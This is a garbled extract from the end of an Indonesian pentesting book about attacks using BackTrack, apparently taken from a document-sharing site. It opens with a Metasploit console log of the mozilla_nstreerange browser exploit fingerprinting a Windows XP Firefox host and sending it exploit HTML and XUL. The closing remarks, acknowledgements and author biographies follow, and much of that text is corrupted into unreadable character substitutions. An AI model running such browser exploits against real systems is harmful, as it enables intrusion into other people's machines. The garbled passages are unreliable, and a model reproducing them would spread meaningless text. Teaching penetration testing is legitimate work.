[*] 192.168.1.11 JavaScript Report: Linux:undefined:undefined:en-
US:x86:undefined:undefined:
[*] 192.168.1.11 404ing /favicon.ico
[*] 192.168.1.11 404ing /favicon.ico
sessid=TWljcm9zb2Z0IFdpbmRvd3M6WFA6dW5kZWZpbmVkOmlkOng4NjpGaXJlZm94OjMuNj
o%3d'
[*] 192.168.1.77 JavaScript Report: Microsoft
Windows:XP:undefined:id:x86:Firefox:3.6:
[*] 192.168.1.77 404ing /favicon.ico
[*] windows/browser/mozilla_nstreerange: Redirecting 192.168.1.77:2143
[*] 192.168.1.77 404ing /favicon.ico
[*] windows/browser/mozilla_nstreerange: Sending HTML to 192.168.1.77:2143
[*] windows/browser/mozilla_nstreerange: Sending XUL to 192.168.1.77:2143
PENUTUP
0emikian yang dapat kami paparkan mengenai buku dari Attacking -ide
1ith $Acktrack" tentunya masih banyak kekurangan dan kelemahannya"
kerena terbatasnya pengetahuan dan kurangnya rujukan atau referensi yang
ada hubungannya dengan judul $uku ini.
Penulis banyak berharap para pembaca yang budiman dapat memberikan
kritik dan saran yang membangun kepada penulis demi sempurnanya buku
ini pada kesempatan 2 kesempatan berikutnya.
-emoga buku ini berguna bagi penulis pada khususnya juga para pembaca
yang budiman pada umumnya.
!ami atas nama Pendiri Indonesian $acktrack 3eam
Zee eichel,Jimmyromanticdevil,Liyan0z,James0baster"
#engucapkan terimakasih kepada Pembina Indonesian $acktrack Bapak
Iwan Sumantri" yang bersedia meluangkan ,aktunya menjadi pembina
I$3eam"demi kemajuan I3 Indonesia.
3idak lupa kami mengucapkan terimakasih kepada Para -taff Indonesian
$acktrack" xsan-lahci, assaprodi!y, "res#he$opeBuster, %oecroet,
&evil'ay ,omputer(eeks ,#$J, konspirasi, shendo, )urank*dankkal ,
Andre_corleone, GTX150, Guitariznoize , sasaka,90Black, ri!htpreneur
,"ip Zenzacky,+ildannovsky
0an Para #ember ndonesian BacktrackTea! yang selama ini telah
berperan penting terhadap kemajuan +,r.-.i#&,#esia#/acktrack.,r.i&
Bio"ra#$% Penulis
==============================================
Zee eichel adalah seorang praktisi linux
security dan merupakan founder dari
komunitas pengguna linu4 backtrack
terbesar di Indonesia Indonesian
Backtrack Team " yang berlokasi pada
alamat ,ebsite
,,,.indonesianbacktrack.or.id " beliau
telah banyak menulis artikel mengenai
linux dan security jaringan komputer.
-ebagai pembicara seminar beliau telah di
undang di berbagai kampus dan instansi
di Indonesia. 5ee +ichel #engembangkan
projek &E' BE(A)A' (NUX *+,,AN- (NE dengan berbagai harapan
dan tujuan mulia. Anda dapat membuka mengenai SBL-CL di situs
<<<.Heest.++.<,r&2ress.c,-. $eliau juga merupakan trainer resmi dari
Training online 009-day yang diselanggarakan oleh I$3eam.
James0baster adalah 6ulusan Uni7ersitas
Indonesia " jurusan tehnik Informatika ini berperan
penuh terhadap perkembangan Indonesian
$acktrack 3eam " sebagai salah satu penanggung
ja,ab -ecurity -er7er Pentest ( -er7er Pentester ) "
James telah memba,a Indonesian $acktrack 3eam
menanjak dari hari ke hari. James(baster juga
merupakan salah satu trainer Indonesian $acktrack
3eam ((8-day dan ahli dalam penetrasi aplikasi ,eb (
,eb pentester ).
Ha/i/i RiHUi Ra-a&ha# a&a%ah trai#er
/erserti+ikasi 8*RE=ALK TRA*NER "a#$
&iajarka# %a#$s.#$ ,%eh T.#$ Dese-
=ari#$i# @4e%atih S.kses N,.1 &i *#&,#esia
!ersi Maja%ah Marketi#$B ? Dr. Er#est =,#$
4h.D. @Si#$a2.rB sehi#$$a -a-2.
-e-/erika# trai#i#$ +ire<a%k &e#$a# a-a#.
Ha/i/i RiHUi Ra-a&ha# te%ah /erja%a# &i atas
a2i se2a#ja#$ 0 -eter %e/ih &ari 1;9 ka%i> &a#
se2a#ja#$ 1' -eter %e/ih &ari 0C
Ha/i/i RiHUi Ra-a&ha# -a-2.
-e#$ajarka# 2eserta secara i%-iah .#t.k
/erja%a# &i atas a2i> -e-aka# a2i> /erja%a# &i
atas /e%i#$> -e-atahka# 2i2a &ra$,# &e#$a#
k,ra#> -e-atahka# /a%,k> -e-/e#$k,ka# /esi &e#$a# %eher> -e-atika# r,k,k
&e#$a# ta#$a#> &a# -e-atika# r,k,k &e#$a# %i&ah
Ha/i/i RiHUi Ra-a&ha# te%ah -e#$ik.ti 2e%atiha# H"2#,sis> H"2#,thera2"> Ne.r,
Li#$.istic 4r,$ra--i#$> E-,ti,#a% 8ree&,- Tech#iU.e> &a# Sha-/a%%a sehi#$$a
-a-2. -e#$hi%a#$ka# ke/iasaa# /.r.k> tra.-a> 2h,/ia serta -e#$hi%a#$ka#
2e#"akit ta#2a ,/at
Se/a$ai Trai#er -.&a &i *#&,#esia> /e%ia. -a-2. BREAKTHR)(GH .#t.k
Kehi&.2a#> Sa%es> Marketi#$> Bis#is> Lea&ershi2 &a# 4./%ic S2eaki#$ ke2a&a ri/.a#
2eserta.

ASWB1

Diunggah oleh

Informasi Dokumen

Hak Cipta

Format Tersedia

Bagikan dokumen Ini

Bagikan atau Tanam Dokumen

Opsi Berbagi

Apakah menurut Anda dokumen ini bermanfaat?

Apakah konten ini tidak pantas?

Hak Cipta:

Format Tersedia

ASWB1

Diunggah oleh

Hak Cipta:

Format Tersedia

www.indonesianbacktrack.or.

Nmap scan report for 192.168.1.255 [host down]

Anda mungkin juga menyukai